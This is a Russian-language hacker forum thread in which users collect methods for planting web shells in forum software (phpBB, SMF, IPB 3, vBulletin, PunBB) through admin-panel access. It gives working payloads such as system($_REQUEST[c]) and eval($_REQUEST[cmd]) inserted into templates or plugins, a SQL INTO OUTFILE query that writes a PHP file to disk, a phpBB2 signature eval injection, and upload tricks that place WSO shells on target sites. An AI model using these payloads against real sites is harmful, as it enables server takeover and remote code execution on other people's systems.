Заливка шелла в форумы

[Ded MustD!e]

Собираем в одном месте способы заливки шелла в различные форумы.

[Shadow]

Заливка шела через темплейты в phpBB3(необходим доступ в админку).

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

Код:

<!-- PHP -->
    system($_REQUEST[c]);
<!-- ENDPHP -->

[Pashkela]

Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Код:

http://site.com/index.php?action=admin

Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

Код:

http://site.com/Themes/wso/wso.php

т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива

[nomad]

Цитата:

Сообщение от Pashkela

Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Код:

http://site.com/index.php?action=admin

Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

Код:

http://site.com/Themes/wso/wso.php

т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива

Иногда при таком способе шелл не открывается. Идем в раздел Packages->Options->Cleanup permissions->"All files are writable". Радуемся

[Pashkela]

Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл:

Код:

http://site.com/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:

http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:

http://site.ru/uploads/av-1.php3

=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master

и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master

появится

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2

где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

Код:

http://forum.site.ru/public/style_images/master2/wso2.php

PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку

[}{оттабыч]

Цитата:

Сообщение от Pashkela

Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл:

Код:

http://site.com/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:

http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:

http://site.ru/uploads/av-1.php3

=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master

и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master

появится

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2

где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

Код:

http://forum.site.ru/public/style_images/master2/wso2.php

PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку

v2.3.6

Сработал вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:

http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:

http://site.ru/uploads/av-1.php3

[Scorpius]

Заливка шелла в phpBB 2.*


1. Создаём файл ex.sql
2. Прописываем туда

Код:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;

Где user_id=2 - идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт "Восстановить БД" и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Код:

http://target/profile.php?mode=editprofile&e=phpinfo();

[Ded MustD!e]

Заливка шелла в vBulletin.

В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:

Код:

http://localhost/forum/faq.php?cmd=phpinfo();

[it's my]

Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

[nomad]

Цитата:

Сообщение от it's my

Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

Для версии 1.2.20 есть что-то? Указанный способ не подходит в виду отсутствия packager